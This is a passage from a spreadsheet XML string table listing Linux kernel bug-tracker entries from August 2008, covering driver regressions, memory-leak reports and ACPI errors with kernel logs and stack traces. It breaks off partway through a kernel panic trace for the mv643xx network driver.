  <si>
    <t>2.6.27-rc3-git2</t>
  </si>
  <si>
    <t>2008-08-15 02:10 UTC</t>
  </si>
  <si>
    <t>2008-08-17 05:47 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.26.1 Earliest failing kernel version: 2.6.27-rc3 Distribution: Slackware 11.0 Hardware Environment: Intel D865GSA Software Environment: Problem Description: Boot either fails, or succeeds but then ethernet network doesn't work. Stack trace in the kernel log, will be added as an attachement. Steps to reproduce: Boot Linux kernel 2.6.27-rc3 or 2.6.27-rc3-git2 on an Intel D865GSA motherboard.</t>
  </si>
  <si>
    <t>connection loss when an additional device is plugged into a 6-port hub</t>
  </si>
  <si>
    <t>2008-08-15 08:57 UTC</t>
  </si>
  <si>
    <t>2009-02-09 14:35 UTC</t>
  </si>
  <si>
    <t>If there is a bus consisting of PC--hub--device_A and another device_B is plugged in into the hub, then the PC may briefly loose contact with device_A. This is troublesome if a filesystem was mounted device_A or the device was otherwise in use. This only happens with _some_ devices as device_B, but presumably with all 6-port hubs. (There is only one known 6-port PHY chip, hence all 6-port hubs are very similar WRT to PHY functionality.) Affected are both the ieee1394 and the firewire driver stack. Windows XP and Mac OS X are known to handle this without connection loss, i.e. without danger to mounted filesystems. More data reported here: http://marc.info/?l=linux1394-user&amp;m=121875239304371</t>
  </si>
  <si>
    <t>saa7146 (budget) dvb device missing frontend driver</t>
  </si>
  <si>
    <t>2008-08-16 01:34 UTC</t>
  </si>
  <si>
    <t>simontol</t>
  </si>
  <si>
    <t>2009-02-22 04:24 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.24 Earliest failing kernel version: 2.6.26-5 Distribution: Ubuntu Intrepid Ibex x86_64 Hardware Environment: Dell E520 + TT-Budget/WinTV-NOVA-S PCI Software Environment: Kaffeine Problem Description: DVB card isn't recognized since kernel 2.6.26. Module in use is 'budget' but I get this error message: [ 6519.449423] saa7146 (0): dma buffer size 192512 [ 6519.449423] DVB: registering new adapter (TT-Budget/WinTV-NOVA-S PCI) [ 6519.512784] adapter has MAC addr = 00:d0:5c:08:fe:c3 [ 6519.600476] budget: A frontend driver was not found for device 1131/7146 subsystem 13c2/1016 Steps to reproduce: Boot up and try to watch TV.</t>
  </si>
  <si>
    <t>AMD Elan regression with 2.6.27-rc3</t>
  </si>
  <si>
    <t>2008-08-16 12:30 UTC</t>
  </si>
  <si>
    <t>2008-08-25 14:51 UTC</t>
  </si>
  <si>
    <t>Subject : AMD Elan regression with 2.6.27-rc3 Submitter : Sean Young &lt;sean@mess.org&gt; Date : 2008-08-15 18:37 References : http://marc.info/?l=linux-kernel&amp;m=121882578430056&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Regression in 2.6.27-rc2 when cross-building the kernel</t>
  </si>
  <si>
    <t>2008-08-16 12:33 UTC</t>
  </si>
  <si>
    <t>2008-09-22 15:01 UTC</t>
  </si>
  <si>
    <t>Subject : Regression in 2.6.27-rc2 when cross-building the kernel Submitter : Larry Finger &lt;Larry.Finger@lwfinger.net&gt; Date : 2008-08-16 2:38 References : http://marc.info/?l=linux-kernel&amp;m=121885432118368&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Can not boot up with zd1211rw USB-Wlan Stick</t>
  </si>
  <si>
    <t>2008-08-16 14:17 UTC</t>
  </si>
  <si>
    <t>uwe</t>
  </si>
  <si>
    <t>2008-10-08 01:27 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version:2.6.26 Earliest failing kernel version:2.6.27 Distribution: Kanotix /debian Hardware Environment: zd1211rw USB-Wlan, CPU Intel P Dual-Core E2200, MB MSI G31M, RAM 2x 1024 MB A-Data Vitesta Kit Cl5 PC2-6400U Software Environment: Debian // Kanotix in current Version Problem Description: I can't boot up with a plugged WLAN - Usb Device. There are no important errormessages while booting up. I tried to connect while Kanotix were running and dmesg gave the following output: [ 654.887294] usb 1-3: new high speed USB device using ehci_hcd and address 5 [ 655.020004] usb 1-3: configuration #1 chosen from 1 choice [ 655.286158] usb 1-3: reset high speed USB device using ehci_hcd and address 5 [ 655.420503] phy0: Selected rate control algorithm 'pid' [ 655.577168] zd1211rw 1-3:1.0: phy0 [ 655.577168] usbcore: registered new interface driver zd1211rw [ 655.588508] ------------[ cut here ]------------ [ 655.588508] kernel BUG at /usr/src/linux-2.6.27-1-generic/ubuntu-2.6/net/mac80211/ieee 80211_i.h:756! [ 655.588508] invalid opcode: 0000 [#1] SMP [ 655.588508] Modules linked in: arc4 ecb crypto_blkcipher zd1211rw mac80211 cfg80211 af _packet nvidia(P) rfcomm l2cap bluetooth nfs lockd nfs_acl sunrpc vboxdrv ppdev parport_p c lp parport video output sbs sbshc container battery ac capifs rsrc_nonstatic pcmcia_cor e nls_iso8859_1 nls_cp437 vfat fat coretemp w83627ehf hwmon_vid fuse speedstep_lib cpufre q_userspace cpufreq_powersave cpufreq_ondemand acpi_cpufreq freq_table psmouse snd_pcsp s nd_hda_intel serio_raw snd_pcm_oss snd_mixer_oss iTCO_wdt dvb_usb_dtt200u snd_pcm dvb_usb iTCO_vendor_support dvb_core snd_timer i2c_core snd ndiswrapper soundcore snd_page_alloc button intel_agp agpgart evdev sg sr_mod cdrom ext3 jbd mbcache dm_snapshot raid10 raid4 56 async_xor async_memcpy async_tx xor raid1 raid0 multipath linear md_mod dm_raid4_5 dm_ region_hash dm_mem_cache dm_message dm_mirror dm_log dm_mod sd_mod crc_t10dif pata_acpi a ta_generic ata_piix libata uhci_hcd scsi_mod dock ehci_hcd r8169 usbcore thermal processo r fan [ 655.588508] [ 655.588508] Pid: 6890, comm: udevd Tainted: P (2.6.27-1-generic #1) [ 655.588508] EIP: 0060:[&lt;f8f7e8a8&gt;] EFLAGS: 00010246 CPU: 1 [ 655.588508] EIP is at netdev_notify+0x88/0x90 [mac80211] [ 655.588508] EAX: f8f98ab8 EBX: dc09c800 ECX: dc09c800 EDX: f7918040 [ 655.588508] ESI: fffffff2 EDI: 00000000 EBP: f78abe54 ESP: f78abe24 [ 655.588508] DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068 [ 655.588508] Process udevd (pid: 6890, ti=f78aa000 task=f609e480 task.ti=f78aa000) [ 655.588508] Stack: fffffff3 00000000 f78abe54 c0104ad7 0000000a dc09c800 f8eb3998 f8ea e78e [ 655.588508] dc09c800 f8eb3998 f8f98b00 fffffff2 f78abe74 c039512c dc09c800 0000 000a [ 655.588508] 00000000 ffffffff 59fa070f 0000000f f78abe88 c014b38e ffffffff 0000 0000 [ 655.588508] Call Trace: [ 655.588508] [&lt;c0104ad7&gt;] ? mcount_call+0x5/0xa [ 655.588508] [&lt;f8eae78e&gt;] ? cfg80211_netdev_notifier_call+0xe/0xf0 [cfg80211] [ 655.588508] [&lt;c039512c&gt;] ? notifier_call_chain+0x3c/0x80 [ 655.588508] [&lt;c014b38e&gt;] ? __raw_notifier_call_chain+0x1e/0x30 [ 655.588508] [&lt;c014b3bf&gt;] ? raw_notifier_call_chain+0x1f/0x30 [ 655.588508] [&lt;c03093e6&gt;] ? call_netdevice_notifiers+0x16/0x20 [ 655.588508] [&lt;c030adda&gt;] ? dev_change_name+0x17a/0x210 [ 655.588508] [&lt;c030c67b&gt;] ? dev_ifsioc+0x10b/0x2a0 [ 655.588508] [&lt;c0391973&gt;] ? mutex_lock+0x13/0x30 [ 655.588508] [&lt;c013a5c0&gt;] ? __capable+0x10/0x30 [ 655.588508] [&lt;c030c9a9&gt;] ? dev_ioctl+0x199/0x230 [ 655.588508] [&lt;c02fc73c&gt;] ? sock_ioctl+0xec/0x220 [ 655.588508] [&lt;c02fc650&gt;] ? sock_ioctl+0x0/0x220 [ 655.588508] [&lt;c01bd48d&gt;] ? vfs_ioctl+0x2d/0x90 [ 655.588508] [&lt;c01bd696&gt;] ? do_vfs_ioctl+0x56/0x120 [ 655.588508] [&lt;c0210315&gt;] ? security_file_ioctl+0x15/0x20 [ 655.588508] [&lt;c01bd7c3&gt;] ? sys_ioctl+0x63/0x80 [ 655.588508] [&lt;c0103ec6&gt;] ? syscall_call+0x7/0xb [ 655.588508] ======================= [ 655.588508] Code: 2d c7 8b 93 7c 07 00 00 8b 42 18 89 34 24 89 c1 e8 1e 3d 28 c7 85 c0 75 a2 89 74 24 04 c7 04 24 08 ac f8 f8 e8 fa 42 1b c7 eb 90 &lt;0f&gt; 0b eb fe 8d 74 26 00 55 89 e5 83 ec 04 e8 0d 62 18 c7 b8 00 [ 655.588508] EIP: [&lt;f8f7e8a8&gt;] netdev_notify+0x88/0x90 [mac80211] SS:ESP 0068:f78abe24 [ 655.588508] ---[ end trace e04f468023f0c671 ]--- Steps to reproduce: Everytime i boot up with the plugged wlan device and also if i try to connect the device while kanotix is running.</t>
  </si>
  <si>
    <t>net: forcedeth call restore mac addr in nv_shutdown path</t>
  </si>
  <si>
    <t>commit f735a2a1a4f2a0f5cd823ce323e82675990469e2</t>
  </si>
  <si>
    <t>2008-08-17 05:43 UTC</t>
  </si>
  <si>
    <t>2008-09-20 08:36 UTC</t>
  </si>
  <si>
    <t>Subject : [PATCH] net: forcedeth call restore mac addr in nv_shutdown path -v2 Submitter : Yinghai Lu &lt;yhlu.kernel@gmail.com&gt; Date : 2008-08-17 3:30 References : http://marc.info/?l=linux-kernel&amp;m=121894389018584&amp;w=4 Handled-By : Yinghai Lu &lt;yhlu.kernel@gmail.com&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=121894389018584&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>mpc8xxx_wdt.c doesn't build modular</t>
  </si>
  <si>
    <t>2.6.27-rc3-git</t>
  </si>
  <si>
    <t>2008-08-17 08:07 UTC</t>
  </si>
  <si>
    <t>2008-08-30 14:09 UTC</t>
  </si>
  <si>
    <t>Subject : mpc8xxx_wdt.c doesn't build modular Submitter : Dave Jones &lt;davej@redhat.com&gt; References : http://lkml.org/lkml/2008/8/12/465 Handled-By : Anton Vorontsov &lt;avorontsov@ru.mvista.com&gt; Patch : http://lkml.org/lkml/2008/8/13/344</t>
  </si>
  <si>
    <t>my servers with nvidia mcp55 nic don't work with msi in second kernel by kexec</t>
  </si>
  <si>
    <t>2008-08-17 09:56 UTC</t>
  </si>
  <si>
    <t>2008-09-06 01:00 UTC</t>
  </si>
  <si>
    <t>Subject : [PATCH] net: forcedeth use pci_choose_state instead of PCI_D3hot - v2 Submitter : Yinghai Lu &lt;yhlu.kernel@gmail.com&gt; Date : 2008-08-17 6:25 References : http://marc.info/?l=linux-kernel&amp;m=121895439927053&amp;w=4 Handled-By : Rafael J. Wysocki &lt;rjw@sisk.pl&gt; This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[linux-2.6/arch/cris/arch-v32/drivers/cryptocop.c:1398]: Memory leak: p</t>
  </si>
  <si>
    <t>2008-08-17 10:39 UTC</t>
  </si>
  <si>
    <t>2008-08-18 00:01 UTC</t>
  </si>
  <si>
    <t>Mikael Starvik</t>
  </si>
  <si>
    <t>Memory leak.. p = kmalloc(padlen, alloc_flag); if (!pad) return -ENOMEM; The same code also appears on line 1430 in the same file.</t>
  </si>
  <si>
    <t>[linux-2.6/arch/powerpc/sysdev/qe_lib/ucc_fast.c:211]: Memory leak: uccf</t>
  </si>
  <si>
    <t>2008-08-17 10:58 UTC</t>
  </si>
  <si>
    <t>2008-09-26 06:25 UTC</t>
  </si>
  <si>
    <t>Tony Breeds</t>
  </si>
  <si>
    <t>Latest working kernel version: Earliest failing kernel version: Distribution: Hardware Environment: Software Environment: Problem Description: Steps to reproduce:</t>
  </si>
  <si>
    <t>adjtimex() fails to set frequency correctly</t>
  </si>
  <si>
    <t>2008-08-19 08:49 UTC</t>
  </si>
  <si>
    <t>Martin Ziegler</t>
  </si>
  <si>
    <t>2008-12-04 13:38 UTC</t>
  </si>
  <si>
    <t>adjtimex() (in sys/timex.h) reduces odd positive frequencies by 1. Negative frequencies are correctly set. Note: Kernels from 2.6.21 to 2.6.25 adjtimex() changed frequencies to the next frequency divisible by 16. In older kernels adjtimex() set frequencies correctly. Note also that, if you use adjtimex() to change the frequency as non-root, and then use it to read the actual frequency, it reports the "expected" new frequency. While of course nothing has changed.</t>
  </si>
  <si>
    <t>[linux-2.6/arch/powerpc/sysdev/qe_lib/ucc_slow.c:174]: Memory leak: uccs</t>
  </si>
  <si>
    <t>2008-08-19 09:43 UTC</t>
  </si>
  <si>
    <t>2008-09-26 06:24 UTC</t>
  </si>
  <si>
    <t>if the ioremap fails, the uccs is not kfree'd. This is pretty similar with 11364</t>
  </si>
  <si>
    <t>[linux-2.6/drivers/s390/net/claw.c:286]: Memory leak: privptr</t>
  </si>
  <si>
    <t>2008-08-19 10:52 UTC</t>
  </si>
  <si>
    <t>2008-08-21 08:40 UTC</t>
  </si>
  <si>
    <t>When bailing out, there is no kfree for privptr, privptr-&gt;p_mtc_envelope nor privptr-&gt;p_env</t>
  </si>
  <si>
    <t>No handler for Region [EC__]  - MSI EX600 notebook</t>
  </si>
  <si>
    <t>2008-08-19 16:53 UTC</t>
  </si>
  <si>
    <t>Dan Vratil</t>
  </si>
  <si>
    <t>2008-10-24 23:19 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: never worked 100%, last best performance in 2.6.25 Earliest failing kernel version: Distribution: ArchLinux up-to-date Hardware Environment: MSI EX600 notebook Problem Description: I have MSI EX600 notebook. ACPI here was never working 100%, but since 2.6.22 it has really improved. 2.6.25.7 was the last version, where ACPI worked pretty good. Sometimes it has "crashed" (no battery, no AC, temperature at 146 C), but in less then minute it has restored to original values, and kept running for some time again. 2.6.25.8 came with Windows Vista ACPI tables. This notebook is recommended for Windows Vista, but paradoxly, this update broke the ACPI. Since this version, ACPI was running some time, than it crashed leaving nothing in dmesg or logs, but haven't restored till next reboot. I've updated to 2.6.26.2 few days ago and I decided to do something with it. Here (http://forums.gentoo.org/viewtopic.php?t=122145) I found, how to check, if my DSDT is buggy. When recompiling, I recieved following warning (seven times - just different lines): dsdt.buggy.dsl 5329: Acquire (MUTE, 0x03E8) Warning 1103 - Possible operator timeout is ignored ^ I fixed them (changing all the values in Acquire to 0xFFFF) and recompiled the DSDT. I also compiled kernel with ACPI debug option enabled. This option brought me following errors in dmesg: ACPI Error (evregion-0315): No handler for Region [EC__] (ffff88007f8145e8) [EmbeddedControl] [20080609] ACPI Error (exfldio-0291): Region EmbeddedControl(3) has no handler [20080609] ACPI Error (psparse-0530): Method parse/execution failed [\_SB_.PCI0.SBRG.EC__.BAT1._STA] (Node ffff88007f815fc0), AE_NOT_EXIST ACPI Error (uteval-0232): Method execution failed [\_SB_.PCI0.SBRG.EC__.BAT1._STA] (Node ffff88007f815fc0), AE_NOT_EXIST ACPI Error (evregion-0315): No handler for Region [EC__] (ffff88007f8145e8) [EmbeddedControl] [20080609] ACPI Error (exfldio-0291): Region EmbeddedControl(3) has no handler [20080609] ACPI Error (psparse-0530): Method parse/execution failed [\_SB_.PCI0.SBRG.EC__.BAT1._STA] (Node ffff88007f815fc0), AE_NOT_EXIST ACPI Error (uteval-0232): Method execution failed [\_SB_.PCI0.SBRG.EC__.BAT1._STA] (Node ffff88007f815fc0), AE_NOT_EXIST Full dmesg output (from 2.6.26.2) is here: http://pastebin.com/m1359a16 Bug itself: ACPI crashes without any trace in logs,dmesg or so. No way to find out why or when. Steps to reproduce: Buy MSI EX600 notebook, install kernel 2.6.25.8 or higher and wait.</t>
  </si>
  <si>
    <t>Link to Bug Filing FAQ broken</t>
  </si>
  <si>
    <t>NA</t>
  </si>
  <si>
    <t>2008-08-20 01:06 UTC</t>
  </si>
  <si>
    <t>Scott Bardone</t>
  </si>
  <si>
    <t>2008-09-02 10:06 UTC</t>
  </si>
  <si>
    <t>Link to Bug Filing FAQ is broken: http://test.kernel.org/bugzilla/faq.html</t>
  </si>
  <si>
    <t>Kernel panic on high UDP load / Module mv643xx</t>
  </si>
  <si>
    <t>2.6.27-rc3-git6</t>
  </si>
  <si>
    <t>2008-08-20 03:17 UTC</t>
  </si>
  <si>
    <t>Gerhard Bertelsmann</t>
  </si>
  <si>
    <t>2008-08-30 16:49 UTC</t>
  </si>
  <si>
    <t>Lennert Buytenhek</t>
  </si>
  <si>
    <t>Latest working kernel version: Earliest failing kernel version: Distribution: Debian Hardware Environment: TS-7800 Software Environment: Debian Lenny Armel Problem Description: Kernel panic on high CPU load Steps to reproduce: netio -u &lt;server&gt; ./netio -t 192.168.0.2 NETIO - Network Throughput Benchmark, Version 1.26 (C) 1997-2005 Kai Uwe Rommel TCP connection established. Packet size 1k bytes: 9661 KByte/s Tx, 13466 KByte/s Rx. Packet size 2k bytes: 9875 KByte/s Tx, 15276 KByte/s Rx. Packet size 4k bytes: 16807 KByte/s Tx, 17449 KByte/s Rx. Packet size 8k bytes: 19488 KByte/s Tx, 21989 KByte/s Rx. Packet size 16k bytes: 25370 KByte/s Tx, 25335 KByte/s Rx. Packet size 32k bytes: 28527 KByte/s Tx, 26968 KByte/s Rx. Done. ts7800:~/soft/netio# ./netio -u 192.168.0.2 NETIO - Network Throughput Benchmark, Version 1.26 (C) 1997-2005 Kai Uwe Rommel UDP connection established. Packet size 1k bytes: 10566 KByte/s (0%) Tx, ksoftirqd/0: page allocation failure. order:0, mode:0x20 [&lt;c030a3e0&gt;] (dump_stack+0x0/0x14) from [&lt;c00797b4&gt;] (__alloc_pages_internal+0x358/0x438) [&lt;c007945c&gt;] (__alloc_pages_internal+0x0/0x438) from [&lt;c0098444&gt;] (cache_alloc_refill+0x370/0x6b8) [&lt;c00980d4&gt;] (cache_alloc_refill+0x0/0x6b8) from [&lt;c009885c&gt;] (__kmalloc+0xd0/0xdc) [&lt;c009878c&gt;] (__kmalloc+0x0/0xdc) from [&lt;c0289af8&gt;] (__alloc_skb+0x54/0xf8) r7:c7807c20 r6:00000640 r5:00000020 r4:c6bc99c0 [&lt;c0289aa4&gt;] (__alloc_skb+0x0/0xf8) from [&lt;c028a644&gt;] (dev_alloc_skb+0x20/0x44) r8:c6bc9a80 r7:00000a30 r6:000000a3 r5:ffc4aa30 r4:06bcc020 [&lt;c028a624&gt;] (dev_alloc_skb+0x0/0x44) from [&lt;c01bc548&gt;] (rxq_refill+0x128/0x1c0) [&lt;c01bc420&gt;] (rxq_refill+0x0/0x1c0) from [&lt;c01bd754&gt;] (mv643xx_eth_poll+0x2d4/0x4d4) [&lt;c01bd480&gt;] (mv643xx_eth_poll+0x0/0x4d4) from [&lt;c028e05c&gt;] (net_rx_action+0x170/0x298) [&lt;c028deec&gt;] (net_rx_action+0x0/0x298) from [&lt;c00481a8&gt;] (__do_softirq+0x74/0xe8) [&lt;c0048134&gt;] (__do_softirq+0x0/0xe8) from [&lt;c00482dc&gt;] (do_softirq+0x58/0x64) [&lt;c0048284&gt;] (do_softirq+0x0/0x64) from [&lt;c0048358&gt;] (ksoftirqd+0x70/0x150) r4:00000000 [&lt;c00482e8&gt;] (ksoftirqd+0x0/0x150) from [&lt;c0059370&gt;] (kthread+0x58/0x8c) r8:00000000 r7:c0409774 r6:c00482e8 r5:00000000 r4:c7820000 [&lt;c0059318&gt;] (kthread+0x0/0x8c) from [&lt;c0045e80&gt;] (do_exit+0x0/0x88c) r7:00000000 r6:00000000 r5:00000000 r4:00000000 Mem-info: DMA per-cpu: CPU 0: hi: 42, btch: 7 usd: 6 Active:2470 inactive:1581 dirty:6 writeback:0 unstable:0 free:130 slab:26474 mapped:712 pagetables:56 bounce:0 DMA free:520kB min:1440kB low:1800kB high:2160kB active:9880kB inactive:6324kB present:130048kB pages_scanned:0 all_unreclaimable? no lowmem_reserve[]: 0 0 0 DMA: 2*4kB 0*8kB 2*16kB 3*32kB 2*64kB 2*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 520kB 3417 total pagecache pages 0 pages in swap cache Swap cache stats: add 0, delete 0, find 0/0 Free swap = 1662716kB Total swap = 1662716kB 32768 pages of RAM 231 free pages 1383 reserved pages 26474 slab pages 3409 pages shared 0 pages swap cached ksoftirqd/0: page allocation failure. order:0, mode:0x20 [&lt;c030a3e0&gt;] (dump_stack+0x0/0x14) from [&lt;c00797b4&gt;] (__alloc_pages_internal+0x358/0x438) [&lt;c007945c&gt;] (__alloc_pages_internal+0x0/0x438) from [&lt;c0098444&gt;] (cache_alloc_refill+0x370/0x6b8) [&lt;c00980d4&gt;] (cache_alloc_refill+0x0/0x6b8) from [&lt;c009885c&gt;] (__kmalloc+0xd0/0xdc) [&lt;c009878c&gt;] (__kmalloc+0x0/0xdc) from [&lt;c0289af8&gt;] (__alloc_skb+0x54/0xf8) r7:c7807c20 r6:00000640 r5:00000020 r4:c6bc99c0 [&lt;c0289aa4&gt;] (__alloc_skb+0x0/0xf8) from [&lt;c028a644&gt;] (dev_alloc_skb+0x20/0x44) r8:c7820000 r7:c01bcdfc r6:c7821f30 r5:00000101 r4:c0408440 [&lt;c028a624&gt;] (dev_alloc_skb+0x0/0x44) from [&lt;c01bc548&gt;] (rxq_refill+0x128/0x1c0) [&lt;c01bc420&gt;] (rxq_refill+0x0/0x1c0) from [&lt;c01bce0c&gt;] (rxq_refill_timer_wrapper+0x10/0x14) [&lt;c01bcdfc&gt;] (rxq_refill_timer_wrapper+0x0/0x14) from [&lt;c004d4f4&gt;] (run_timer_softirq+0x1cc/0x278) [&lt;c004d328&gt;] (run_timer_softirq+0x0/0x278) from [&lt;c00481a8&gt;] (__do_softirq+0x74/0xe8) [&lt;c0048134&gt;] (__do_softirq+0x0/0xe8) from [&lt;c00482dc&gt;] (do_softirq+0x58/0x64) [&lt;c0048284&gt;] (do_softirq+0x0/0x64) from [&lt;c0048358&gt;] (ksoftirqd+0x70/0x150) r4:00000000 [&lt;c00482e8&gt;] (ksoftirqd+0x0/0x150) from [&lt;c0059370&gt;] (kthread+0x58/0x8c) r8:00000000 r7:c0409774 r6:c00482e8 r5:00000000 r4:c7820000 [&lt;c0059318&gt;] (kthread+0x0/0x8c) from [&lt;c0045e80&gt;] (do_exit+0x0/0x88c) r7:00000000 r6:00000000 r5:00000000 r4:00000000 Mem-info: DMA per-cpu: CPU 0: hi: 42, btch: 7 usd: 6 Active:2470 inactive:1581 dirty:6 writeback:0 unstable:0 free:130 slab:26474 mapped:712 pagetables:56 bounce:0 DMA free:520kB min:1440kB low:1800kB high:2160kB active:9880kB inactive:6324kB present:130048kB pages_scanned:0 all_unreclaimable? no lowmem_reserve[]: 0 0 0 DMA: 2*4kB 0*8kB 2*16kB 3*32kB 2*64kB 2*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 520kB 3417 total pagecache pages 0 pages in swap cache Swap cache stats: add 0, delete 0, find 0/0 Free swap = 1662716kB Total swap = 1662716kB 32768 pages of RAM 231 free pages 1383 reserved pages 26474 slab pages 3409 pages shared 0 pages swap cached ksoftirqd/0: page allocation failure. order:0, mode:0x20 [&lt;c030a3e0&gt;] (dump_stack+0x0/0x14) from [&lt;c00797b4&gt;] (__alloc_pages_internal+0x358/0x438) [&lt;c007945c&gt;] (__alloc_pages_internal+0x0/0x438) from [&lt;c0098444&gt;] (cache_alloc_refill+0x370/0x6b8) [&lt;c00980d4&gt;] (cache_alloc_refill+0x0/0x6b8) from [&lt;c009885c&gt;] (__kmalloc+0xd0/0xdc) [&lt;c009878c&gt;] (__kmalloc+0x0/0xdc) from [&lt;c0289af8&gt;] (__alloc_skb+0x54/0xf8) r7:c7807c20 r6:00000640 r5:00000020 r4:c6bc99c0 [&lt;c0289aa4&gt;] (__alloc_skb+0x0/0xf8) from [&lt;c028a644&gt;] (dev_alloc_skb+0x20/0x44) r8:c7820000 r7:c01bcdfc r6:c7821f30 r5:00000101 r4:c0408440 [&lt;c028a624&gt;] (dev_alloc_skb+0x0/0x44) from [&lt;c01bc548&gt;] (rxq_refill+0x128/0x1c0) [&lt;c01bc420&gt;] (rxq_refill+0x0/0x1c0) from [&lt;c01bce0c&gt;] (rxq_refill_timer_wrapper+0x10/0x14) [&lt;c01bcdfc&gt;] (rxq_refill_timer_wrapper+0x0/0x14) from [&lt;c004d4f4&gt;] (run_timer_softirq+0x1cc/0x278) [&lt;c004d328&gt;] (run_timer_softirq+0x0/0x278) from [&lt;c00481a8&gt;] (__do_softirq+0x74/0xe8) [&lt;c0048134&gt;] (__do_softirq+0x0/0xe8) from [&lt;c00482dc&gt;] (do_softirq+0x58/0x64) [&lt;c0048284&gt;] (do_softirq+0x0/0x64) from [&lt;c0048358&gt;] (ksoftirqd+0x70/0x150) r4:00000000 [&lt;c00482e8&gt;] (ksoftirqd+0x0/0x150) from [&lt;c0059370&gt;] (kthread+0x58/0x8c) r8:00000000 r7:c0409774 r6:c00482e8 r5:00000000 r4:c7820000 [&lt;c0059318&gt;] (kthread+0x0/0x8c) from [&lt;c0045e80&gt;] (do_exit+0x0/0x88c) r7:00000000 r6:00000000 r5:00000000 r4:00000000 Mem-info: DMA per-cpu: CPU 0: hi: 42, btch: 7 usd: 6 Active:2470 inactive:1581 dirty:6 writeback:0 unstable:0 free:130 slab:26474 mapped:712 pagetables:56 bounce:0 DMA free:520kB min:1440kB low:1800kB high:2160kB active:9880kB inactive:6324kB present:130048kB pages_scanned:0 all_unreclaimable? no lowmem_reserve[]: 0 0 0 DMA: 2*4kB 0*8kB 2*16kB 3*32kB 2*64kB 2*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 520kB 3417 total pagecache pages 0 pages in swap cache Swap cache stats: add 0, delete 0, find 0/0 Free swap = 1662716kB Total swap = 1662716kB 32768 pages of RAM 231 free pages 1383 reserved pages 26474 slab pages 3409 pages shared 0 pages swap cached ksoftirqd/0: page allocation failure. order:0, mode:0x20 [&lt;c030a3e0&gt;] (dump_stack+0x0/0x14) from [&lt;c00797b4&gt;] (__alloc_pages_internal+0x358/0x438) [&lt;c007945c&gt;] (__alloc_pages_internal+0x0/0x438) from [&lt;c0098444&gt;] (cache_alloc_refill+0x370/0x6b8) [&lt;c00980d4&gt;] (cache_alloc_refill+0x0/0x6b8) from [&lt;c009885c&gt;] (__kmalloc+0xd0/0xdc) [&lt;c009878c&gt;] (__kmalloc+0x0/0xdc) from [&lt;c0289af8&gt;] (__alloc_skb+0x54/0xf8) r7:c7807c20 r6:00000640 r5:00000020 r4:c6bc99c0 [&lt;c0289aa4&gt;] (__alloc_skb+0x0/0xf8) from [&lt;c028a644&gt;] (dev_alloc_skb+0x20/0x44) r8:c7820000 r7:c01bcdfc r6:c7821f30 r5:00000101 r4:c0408440 [&lt;c028a624&gt;] (dev_alloc_skb+0x0/0x44) from [&lt;c01bc548&gt;] (rxq_refill+0x128/0x1c0) [&lt;c01bc420&gt;] (rxq_refill+0x0/0x1c0) from [&lt;c01bce0c&gt;] (rxq_refill_timer_wrapper+0x10/0x14) [&lt;c01bcdfc&gt;] (rxq_refill_timer_wrapper+0x0/0x14) from [&lt;c004d4f4&gt;] (run_timer_softirq+0x1cc/0x278) [&lt;c004d328&gt;] (run_timer_softirq+0x0/0x278) from [&lt;c00481a8&gt;] (__do_softirq+0x74/0xe8) [&lt;c0048134&gt;] (__do_softirq+0x0/0xe8) from [&lt;c00482dc&gt;] (do_softirq+0x58/0x64) [&lt;c0048284&gt;] (do_softirq+0x0/0x64) from [&lt;c0048358&gt;] (ksoftirqd+0x70/0x150) r4:00000000 [&lt;c00482e8&gt;] (ksoftirqd+0x0/0x150) from [&lt;c0059370&gt;] (kthread+0x58/0x8c) r8:00000000 r7:c0409774 r6:c00482e8 r5:00000000 r4:c7820000 [&lt;c0059318&gt;] (kthread+0x0/0x8c) from [&lt;c0045e80&gt;] (do_exit+0x0/0x88c) r7:00000000 r6:00000000 r5:00000000 r4:00000000 Mem-info: DMA per-cpu: CPU 0: hi: 42, btch: 7 usd: 6 Active:2470 inactive:1581 dirty:6 writeback:0 unstable:0 free:130 slab:26474 mapped:712 pagetables:56 bounce:0 DMA free:520kB min:1440kB low:1800kB high:2160kB active:9880kB inactive:6324kB present:130048kB pages_scanned:0 all_unreclaimable? no lowmem_reserve[]: 0 0 0 DMA: 2*4kB 0*8kB 2*16kB 3*32kB 2*64kB 2*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 520kB 3417 total pagecache pages 0 pages in swap cache Swap cache stats: add 0, delete 0, find 0/0 Free swap = 1662716kB Total swap = 1662716kB 32768 pages of RAM 231 free pages 1383 reserved pages 26474 slab pages 3409 pages shared 0 pages swap cached ksoftirqd/0: page allocation failure. order:0, mode:0x20 [&lt;c030a3e0&gt;] (dump_stack+0x0/0x14) from [&lt;c00797b4&gt;] (__alloc_pages_internal+0x358/0x438) [&lt;c007945c&gt;] (__alloc_pages_internal+0x0/0x438) from [&lt;c0098444&gt;] (cache_alloc_refill+0x370/0x6b8) [&lt;c00980d4&gt;] (cache_alloc_refill+0x0/0x6b8) from [&lt;c009885c&gt;] (__kmalloc+0xd0/0xdc) [&lt;c009878c&gt;] (__kmalloc+0x0/0xdc) from [&lt;c0289af8&gt;] (__alloc_skb+0x54/0xf8) r7:c7807c20 r6:00000640 r5:00000020 r4:c6bc99c0 [&lt;c0289aa4&gt;] (__alloc_skb+0x0/0xf8) from [&lt;c028a644&gt;] (dev_alloc_skb+0x20/0x44) r8:c7820000 r7:c01bcdfc r6:c7821f30 r5:00000101 r4:c0408440 [&lt;c028a624&gt;] (dev_alloc_skb+0x0/0x44) from [&lt;c01bc548&gt;] (rxq_refill+0x128/0x1c0) 